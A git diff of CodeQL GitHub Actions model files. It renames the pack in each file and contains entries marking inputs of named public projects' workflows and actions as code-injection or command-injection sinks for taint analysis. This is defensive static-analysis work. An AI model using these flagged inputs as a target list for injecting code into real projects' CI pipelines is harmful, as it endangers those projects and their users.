@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index f4c2d488ba3..64f3c208540 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 8a11ced42d0..9c2d7a421db 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index 4c018b20f22..1410fd6fbe9 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 315c85efeb6..eca441b608a 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index 8a3132d5258..2868aecd064 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index 9a669c8c009..0aa2d1c596c 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 0ecb817822c..02fe1b2055f 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index e4590eeec8b..9f6401ec03e 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index ea0ddad0697..373b507f2f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml 
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 9352f766e82..9b68b660586 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index d436644f4ac..ddce9773100 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index c6c01abca90..3aa599e00d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index 8a9f76e7e52..4ff3377e6eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index 8b3cfebc67b..577ffa78d82 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index 9add4859f35..99ff06a4aee 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index efc8097b963..5241bc1bcb1 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 6a305522cfb..66221185cbd 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index 441325c76a5..eb5207528d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index 5f0831afc07..1337b0e76ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index afd7aabc1fc..1d8b8f0e9f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index 49e556f585f..4eaa610a3a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index 24585aa50ed..a62139e12c4 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index afc7af28f9b..2f3f85fe424 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 5b3d91a8a7b..f39a027eda7 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index b43253eb619..5a0b692e4e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index 89559cf57e3..ae902cb95ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 6292841e56a..78379dd7796 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 9f98fd51139..0eeed9a1f17 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index e04605511b8..3ab501e1b1f 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index a77181e6c4e..caa0ee6d7cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index 6c90e29a43b..b660b0bc4ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 6bacbc181da..0fe5470bb11 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index 83d438d4e3d..a9cd5759cf2 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 703a766cb4c..5b0dc5da53d 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index ecb4c809efe..c90d1ac8afb 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index 9b02577be7d..8d68efb9247 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index 1ffc3df1c81..cb127c7ff46 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 53ed1840b0a..79936a51520 100644 
--- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml index 17d2ed2e473..9bc26169b27 100644 --- a/ql/lib/ext/go-semantic-release_action.model.yml +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml index 68c2552c350..8aa19f94452 100644 --- a/ql/lib/ext/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml index 977f6b98ae4..dc86b19a69b 100644 --- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml index 616f7fdb9ca..bc9f2aad14c 100644 --- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml 
+++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml index e4961ae5ed6..c3604795c25 100644 --- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 19cce83c691..dfcc204c2ba 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index f838eeed0eb..c8d5e822c02 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 48e5b05128f..5c7ec5f957f 100644 
--- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml index 448997b3136..5384571801c 100644 --- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml index 13af446f37d..ba5de742701 100644 --- a/ql/lib/ext/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml index 39e1c9ef624..ce0fb573493 100644 --- a/ql/lib/ext/imjohnbo_issue-bot.model.yml +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml index a442ed5cd53..8f53dfeb118 100644 --- a/ql/lib/ext/iterative_setup-cml.model.yml +++ b/ql/lib/ext/iterative_setup-cml.model.yml 
